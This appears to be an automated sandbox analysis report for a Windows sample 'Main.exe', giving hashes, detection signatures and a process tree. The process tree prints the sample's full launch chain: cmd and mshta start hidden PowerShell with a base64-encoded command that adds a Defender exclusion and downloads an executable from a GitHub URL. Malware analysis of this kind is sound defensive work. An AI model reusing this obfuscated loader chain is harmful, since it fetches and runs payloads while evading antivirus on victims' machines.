Analysis
-
max time kernel
34s -
max time network
33s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
21-07-2024 15:56
Behavioral task
behavioral1
Sample
Main.exe
Resource
win10v2004-20240709-en
windows10-2004-x64
2 signatures
150 seconds
General
-
Target
Main.exe
-
Size
54KB
-
MD5
43dad7e79501c9a582ac3029e202c022
-
SHA1
ca65c14bc3d9f9866474f5d6c360fbb86d8fd7d7
-
SHA256
9dfbea040f243f9bd53e021233cfd06cb7c1a077367ee981d8fa61e622675398
-
SHA512
5e0d492d3eedf7476b70a1659b8d0330b1df367d5538a7e5b02186127a47fc40bc2666669f4e091f6561be77826c61d0006f8b5174ba464d0ba3b570fb4f59f5
-
SSDEEP
1536:+BiHZIDQpZSfo12aUwww42Rlfp4KVVHw:+Bi5/ZxuYxp4KV
Score
7/10
Malware Config
Signatures
-
resource yara_rule behavioral1/memory/3740-0-0x00007FF6EE180000-0x00007FF6EE1A5000-memory.dmp upx behavioral1/memory/3740-1-0x00007FF6EE180000-0x00007FF6EE1A5000-memory.dmp upx -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3740 wrote to memory of 4944 3740 Main.exe 85 PID 3740 wrote to memory of 4944 3740 Main.exe 85 PID 4944 wrote to memory of 4060 4944 cmd.exe 86 PID 4944 wrote to memory of 4060 4944 cmd.exe 86 PID 4060 wrote to memory of 4044 4060 cmd.exe 87 PID 4060 wrote to memory of 4044 4060 cmd.exe 87
Processes
-
C:\Users\Admin\AppData\Local\Temp\Main.exe"C:\Users\Admin\AppData\Local\Temp\Main.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3740 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c start /min "" mshta "javascript:var shell=new ActiveXObject('WScript.Shell'); shell.Run('powershell.exe -w Hidden -NoP -ExecutionPolicy Bypass -EncodedCommand YwBkACAAJABlAG4AdgA6AFUARQBSAFMAPQAkAGUAbgB2ADoAVQBTAEUAUgBQUk9GSUxFAFAAOwAgAGMAYwBEAGUAcwBrAHQAbwBQAFwAUgBhAHQAdABlAHIAcwB0AG8AbwBmADsAIABtAGsAZABpAHIAIABUAE0AUAA7ACAAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEYAYQBuAHQAYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAVABNAFAAOwAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AdQBuAGIAbABvAGMAawBlAGQAZwBhAG0AZQBzADIALwB6AHYAZwBmAGQALwByAGEAdwAvAG0AYQBpAG4ALwBTAGUAcgB2AGUAcgAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAVABNAFAAXABTAGUAcgB2AGUAcgAuAGUAeABl', 0); close();"2⤵
- Suspicious use of WriteProcessMemory
PID:4944 -
C:\Windows\system32\cmd.execmd /c start /min "" mshta "javascript:var shell=new ActiveXObject('WScript.Shell'); shell.Run('powershell.exe -w Hidden -NoP -ExecutionPolicy Bypass -EncodedCommand YwBkACAAJABlAG4AdgA6AFUARQBSAFMAPQAkAGUAbgB2ADoAVQBTAEUAUgBQUk9GSUxFAFAAOwAgAGMAYwBEAGUAcwBrAHQAbwBQAFwAUgBhAHQAdABlAHIAcwB0AG8AbwBmADsAIABtAGsAZABpAHIAIABUAE0AUAA7ACAAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEYAYQBuAHQAYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAVABNAFAAOwAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AdQBuAGIAbABvAGMAawBlAGQAZwBhAG0AZQBzADIALwB6AHYAZwBmAGQALwByAGEAdwAvAG0AYQBpAG4ALwBTAGUAcgB2AGUAcgAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAVABNAFAAXABTAGUAcgB2AGUAcgAuAGUAeABl', 0); close();"3⤵
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Windows\system32\mshta.exemshta "javascript:var shell=new ActiveXObject('WScript.Shell'); shell.Run('powershell.exe -w Hidden -NoP -ExecutionPolicy Bypass -EncodedCommand YwBkACAAJABlAG4AdgA6AFUARQBSAFMAPQAkAGUAbgB2ADoAVQBTAEUAUgBQUk9GSUxFAFAAOwAgAGMAYwBEAGUAcwBrAHQAbwBQAFwAUgBhAHQAdABlAHIAcwB0AG8AbwBmADsAIABtAGsAZABpAHIAIABUAE0AUAA7ACAAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEYAYQBuAHQAYQBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAVABNAFAAOwAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AdQBuAGIAbABvAGMAawBlAGQAZwBhAG0AZQBzADIALwB6AHYAZwBmAGQALwByAGEAdwAvAG0AYQBpAG4ALwBTAGUAcgB2AGUAcgAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAVABNAFAAXABTAGUAcgB2AGUAcgAuAGUAeABl', 0); close();"4⤵PID:4044
-
-
-